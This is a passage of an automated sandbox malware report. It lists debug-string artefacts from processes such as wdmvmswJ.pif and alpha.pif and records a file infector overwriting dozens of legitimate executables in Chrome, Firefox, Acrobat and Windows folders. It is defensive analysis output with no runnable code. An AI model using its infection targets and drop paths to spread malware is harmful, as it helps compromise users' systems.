                Source: Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

                Spreading

                barindex
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\vds.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02AF5908
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,13_2_00020207
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,13_2_0002589A
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,13_2_00033E66
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_00024EC1
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,13_2_0001532E
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,17_2_0002589A
